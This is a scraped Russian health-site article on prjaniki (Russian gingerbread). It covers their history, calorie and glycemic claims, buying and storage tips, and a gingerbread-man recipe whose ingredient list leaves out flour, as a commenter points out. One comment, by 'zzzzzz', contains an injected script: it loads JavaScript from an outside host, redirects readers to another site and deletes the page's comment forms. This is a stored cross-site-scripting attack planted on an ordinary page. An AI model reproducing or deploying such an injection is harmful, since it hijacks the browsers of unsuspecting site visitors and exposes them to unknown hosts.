Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Пряники. Русское лакомств...  >>  Пряники. Русское лакомство
 
Обратная связь
 

Пряники. Русское лакомство

Размер шрифта
25 января 2012 08:00
  • google_analytics: false
  • Нравится

Пряники — одно из древнейших русских лакомств. Пряниками их наши предки называли за пряный вкус и аромат. Пряники долго не черствеют и долго сохраняют свой вкус. Насколько они полезны?

Название «пряник» происходит от слова «пряность», так как обязательной добавкой в пряничное тесто является смесь молотой корицы, гвоздики, кардамона, мускатного ореха, бадьяна, перца душистого и черного, имбиря, ванилина. Пряник выпекается из специального теста с добавлением мёда, имбиря, фруктового или ягодного повидла. Наиболее известны своими пряниками Тула, Городец, Вязьма, Архангельск. Среди европейских «пряничных» городов — польский Торунь, чешский Пардубице, немецкий Нюрнберг.

В старину, пряники, которые дарили в знак уважения и заслуги весили по несколько килограмм. Чем выше чин одариваемого, тем тяжелее пряник. Угощение для царской семьи весило подчас несколько пудов и доставлялось по назначению на двух санях.

В зависимости от способа приготовления теста пряники бывают: сырцовые (с заваркой муки на холодном сиропе); заварные (с заваркой муки горячим сахаропаточным или сахаромедовым сиропом).

Отрицательные качества

Известно, что большое увлечение выпечкой наносит организму большой вред. В выпечке содержится слишком много углеводов, другими словами, она очень калорийна. Это приводит к развитию атеросклероза и ожирению.

Пьедестал почета по содержанию калорий

  1. Печенье – 417,1 кКал.

  2. Пряник - 364 кКал.

  3. Кусок белого хлеба – 266 кКал.

У пряников высокий гликемический индекс – 80. Это значит, что его глюкоза быстро попадает в кровь. Тем самым он вызывает быстрое повышение сахара крови. Это может привести к диабету 2-го типа.

Как выбрать

Полиэтиленовая упаковка должна быть обязательно. И она должна быть герметичной, нигде не пропускать воздух. Без нее пряники быстро засыхают или, наоборот, впитывают лишнюю влагу. Обратите внимание не на форму пряников, а на их края. Они должны быть ровными и аккуратными. Расплывшиеся, бесформенные бока говорят о нарушении технологии производства или о некачественном сырье. Глазировка должна быть равномерной и четкой. Кусочки глазури не должны откалываться и рассыпаться. Пряники не должны быть хрупкими. Загляните в пакетик – там должно быть не больше 1-2 отломанных кусков и отломанной глазури.

Как хранить

Пряники нужно хранить в сухом прохладном месте в герметично закрытом пластиковом контейнере или плотно закрытом бумажном пакете. Положите туда ломтик яблока – так они долго не будут черстветь, сохранят свой вкус и аромат.

Как готовить пряничного человечка

Ингредиенты

  • Масло сливочное – 80 г
  • Сахар – 50 г
  • Желток яйца – 1.
  • Разрыхлитель – ½ ч.л.
  • Молотый имбирь – ½ ч.л.
  • Корица 1\2 ч.л.

Для глазури:

  • Белок яйца – 1
  • Сахарная пудра – 200 г

Желток взбить с сахаром. Добавить растопленное сливочное масло, молотый имбирь, корицу, разрыхлитель и муку. Из теста сделать шар, накрыть пищевой пленкой, поставить на 30 мин в холодильник. Раскатать тесто толщиной 1,5-2 см и вырезать из него человечка. Можно использовать трафарет из картона. Смазать противень растительным маслом, выложить на него человечка, выпекать 15 минут. Украсить человечка глазурью.

Сюжеты по теме:
Пряник. Старинное русское лакомство

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - Гость

06 августа 2012 в 09:36

Цитировать   |   Пожаловаться

А сколько муки - то?

Гость 06 августа 2012 в 09:36
А сколько муки - то?
 Начните с 1 - 1,5 стаканов, постепенно добавляя, пока не получите упругий, но нежный  "колобок"

Гость 06 августа 2012 в 09:36
А сколько муки - то?
 Начните с 1 - 1,5 стаканов, постепенно добавляя, пока не получите упругий, но нежный  "колобок"

4 - zzzzzz

30 июня 2015 в 23:59

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
Мед для похудения   Самые популярные мифы о диабете   Что влияет на показатели сахара?   Сахарный запой. Почему так сложно отказаться от сахара?  
04 сентября 2012Косметика вызывает диабет! 30 августа 2012Высокий сахар в крови приводит к старческому слабоумию!
 
28 августа 2012Если вы лечите диабет – будете умнее! 15 августа 2012Обнаружены механизмы, контролирующие ожирение и атеросклероз!
 

Слайдшоу

1
Убийцы эрекции вашего мужа
Смертельно опасные продукты для печени
Как побороть зависимость от сахара

Тесты

1
Есть ли у вас избыточный вес?
Жиры, которые мы едим
Готовы ли вы сбросить лишнее?
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.